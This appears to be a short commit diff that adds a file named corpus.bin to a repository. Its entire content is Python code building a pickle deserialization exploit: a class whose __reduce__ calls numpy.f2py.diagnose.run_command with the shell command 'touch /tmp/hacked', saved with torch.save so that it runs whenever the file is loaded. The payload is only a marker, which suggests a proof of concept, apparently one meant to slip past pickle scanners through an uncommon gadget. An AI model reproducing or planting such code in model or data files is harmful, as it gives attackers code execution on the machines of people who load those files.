Create corpus.bin
Browse files- corpus.bin +1 -0
corpus.bin
ADDED
|
@@ -0,0 +1 @@
|
|
|
|
|
|
|
| 1 |
+
import torch class Exploit: def __reduce__(self): import numpy.f2py.diagnose return numpy.f2py.diagnose.run_command, ('touch /tmp/hacked', ) torch.save(Exploit(), 'payload/corpus.bin')
|